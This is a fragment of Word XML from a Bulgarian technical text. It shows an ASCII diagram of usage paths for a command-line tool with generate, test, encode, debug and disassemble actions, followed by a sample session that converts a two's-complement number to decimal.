    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |          +----------+  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ask for        |  debug   |  |   select         select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   bytes         |  tools   |  +-&gt;  test  &lt;------- arch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ^          +----------+         |              ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |              |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v              v              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   select           select       export to     +----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    arch       +-&gt; utility         binary      |   test   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ^        |       |              |        +----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |        |       |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |        |       |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+----------+   |       v              v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  encode  |   |    output          exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+----------+   +--   text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                     exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Блокова диаграма на пътища на употреба</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">От нея личи, че е малко вероятно един потребител да иска да се отклони от тези пътища. Това дава възможност за намаляне на изискванията към </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>интерфейса, без да се ограничава неговата функционалност. Свободата се запазва, но потокът на програмата може да бъде вкаран в рамки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Тази малка на външен вид промяна в дизайна, позволява голяма степен на опростяване на логиката на инструмента и подобряване на адаптацията на потребителския вход към нуждите на всяка команда. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Въвеждането на това ограничение води до няколко допълнителни основни идеи и допълване на съществуващите, които финализират основното поведение на инструмента:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_m908cty6sqdi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="131" w:name="_Toc3540801"/>
      <w:bookmarkEnd w:id="130"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>“Водено” изпълнение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F56EB" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">От графиката на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref2190781 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>+----------+                      preview          exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>| generate |           +---------  module            ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+----------+           |              ^              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |              |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      v                v              |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   select           select            |          ask for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    arch --------&gt;  module  ----------+           bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |                             ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |                             |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       v                             |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                 preview text                     select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      +--------&gt;   assembly                        arch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |                             ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |                             |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v                      +-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |           export to    +-&gt;  exit      | disassemble |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |             binary     |              +-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |                     ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |                     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v       |                     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   select           extract  --+                     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  encoder   &lt;-----   bytes   ------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ^                      --+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |          +----------+  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ask for        |  debug   |  |   select         select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   bytes         |  tools   |  +-&gt;  test  &lt;------- arch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ^          +----------+         |              ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |              |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v              v              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   select           select       export to     +----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    arch       +-&gt; utility         binary      |   test   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ^        |       |              |        +----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |        |       |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |        |       |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+----------+   |       v              v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  encode  |   |    output          exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+----------+   +--   text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                     exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F5FC6" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Блокова диаграма на пътища на употреба</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:t>могат да се дефинират три</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t xml:space="preserve"> типа действия, които един потребител би извършил: избор от </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>списък с опции, въвеждане на текстов параметър и потвърждение за продължаване. С цел допълнително да се намали необходимостта потребителят ръчно да пише команди, те могат да бъдат съкратени с по 1-2 букви или цифри. Също така всяко действие може да има стойност по подразбиране, стига това да има смисъл. Например за превръщане на цифра от “two’s complement” в десетична цифра:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>python automation/tool.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>1. generate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>2. test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>3. encode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>4. debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>5. disassemble</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Select [1]: 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Utilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>1. Two's complement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>2. htons</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>3. null byte check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>4. quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Select [1]:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>two's complement number: 0xfff7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>-9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Utilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>1. Two's complement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>2. htons</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>3. null byte check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>4. quit</w:t>
      </w:r>
